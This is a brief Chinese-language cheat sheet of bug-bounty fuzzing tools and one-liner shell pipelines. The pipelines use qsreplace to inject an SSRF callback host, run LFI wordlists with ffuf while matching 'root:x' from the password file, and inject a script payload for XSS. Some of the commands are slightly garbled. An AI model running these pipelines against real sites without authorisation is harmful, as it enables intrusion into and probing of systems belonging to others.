FUZZ
目录
tool
gau
从各个网站找域名的url
qsreplace
将一个url里的所有参数替换为一个固定值
ffuf
综合fuzz工具
gf
https://github.com/1ndianl33t/Gf-Patterns
一个强大的匹配工具,grep plus。 可以通过gf xss等命令快速匹配与xss相关的东西
HTTPX
探活+指纹
FUZZ ssrf
findomain -t example.com -q | httpx -silent -threads 1000 | gau | grep “=” | qsreplace http://YOUR.burpcollaborator.net
FUZZ LFI
findomain -t example.com -q | waybackurls |gf lfi | qsreplace FUZZ | while read url ; do ffuf -u $url -mr “root:x” -w ~/wordlist/LFI.txt ; done
FUZZ xss
cat file.txt | gf xss | grep ‘source=’ | qsreplace ‘”><script>confirm(1)</script>’ | while read host do ; do curl –silent –path-as-is –insecure “$host” | grep -qs “<script>confirm(1)” && echo “$host 33[0;31mVulnerablen”;done